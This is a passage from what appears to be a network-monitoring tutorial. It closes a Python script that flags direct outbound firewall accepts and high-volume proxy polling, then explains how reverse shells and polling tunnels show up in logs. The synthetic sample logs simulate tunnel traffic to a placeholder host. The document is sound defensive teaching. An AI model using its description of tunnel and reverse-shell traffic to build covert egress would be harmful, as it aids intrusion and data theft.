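    "2002-11-20 09:12:11 ACCEPT TCP 10.1.5.23:1060 -> 10.1.1.10:8080",       # workstation to proxy: fine
    "2002-11-20 09:12:14 ACCEPT UDP 10.1.5.30:1234 -> 10.1.1.5:53",          # internal DNS: fine
]
PROXY_SAMPLE = [
    "2002-11-20 10:00:01 10.1.5.23 GET http://www.example.com/index.html 200 5120",
    "2002-11-20 10:00:03 10.1.5.41 CONNECT mail.example.net:443 200 3400",
] + [f"2002-11-20 10:{1 + i // 60:02d}:{i % 60:02d} 10.1.5.40 GET "
     f"http://tunnel.example.net/poll?seq={i} 200 128" for i in range(60)]

if __name__ == "__main__":
    for rule, evidence in review_firewall(FW_SAMPLE) + review_proxy(PROXY_SAMPLE):
        print(f"[{rule}] {evidence}")
```

The direct-outbound rule is the important one for reverse shells: with a proxy-only egress policy, every ACCEPT from a workstation to the Internet is a policy failure, whatever the port. The volume rule is deliberately crude; a polling tunnel shows up as a steady stream of small requests to one host, which is what the slide tells you to go and browse for yourself.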